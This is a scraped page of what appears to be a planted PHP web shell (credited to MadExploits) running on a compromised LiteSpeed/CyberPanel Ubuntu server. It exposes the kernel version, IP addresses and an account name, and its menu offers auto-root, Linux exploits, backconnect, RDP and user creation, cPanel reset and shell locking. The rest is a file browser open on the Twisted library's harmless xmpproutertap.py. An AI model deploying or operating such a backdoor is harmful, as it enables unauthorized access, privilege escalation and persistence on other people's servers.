Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
twisted /
words /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
im
[ DIR ]
drwxr-xr-x
protocols
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
xish
[ DIR ]
drwxr-xr-x
__init__.py
215
B
-rw-r--r--
ewords.py
645
B
-rw-r--r--
iwords.py
8.41
KB
-rw-r--r--
service.py
37.88
KB
-rw-r--r--
tap.py
2.61
KB
-rw-r--r--
xmpproutertap.py
781
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : xmpproutertap.py
# -*- test-case-name: twisted.words.test.test_xmpproutertap -*- # # Copyright (c) Twisted Matrix Laboratories. # See LICENSE for details. from twisted.application import strports from twisted.python import usage from twisted.words.protocols.jabber import component class Options(usage.Options): optParameters = [ ("port", None, "tcp:5347:interface=127.0.0.1", "Port components connect to"), ("secret", None, "secret", "Router secret"), ] optFlags = [ ("verbose", "v", "Log traffic"), ] def makeService(config): router = component.Router() factory = component.XMPPComponentServerFactory(router, config["secret"]) if config["verbose"]: factory.logTraffic = True return strports.service(config["port"], factory)
Close